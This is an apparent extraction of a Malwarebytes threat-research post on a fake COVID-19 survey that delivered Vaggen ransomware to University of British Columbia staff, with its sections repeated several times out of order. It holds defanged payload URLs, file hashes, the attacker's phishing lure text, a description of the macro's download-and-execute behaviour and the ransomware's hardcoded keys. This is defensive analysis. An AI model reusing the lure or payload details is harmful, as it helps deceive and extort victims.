layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1224 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1225 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1226 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1227 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1228 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1229 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1230 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1231 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1232 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1233 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1234 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1235 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1236 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1237 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1238 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1239 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1240 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1241 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1242 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1243 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1244 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1245 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1246 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1247 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1248 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1249 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1250 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1251 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1252 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1253 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1254 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1255 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1256 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1257 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit 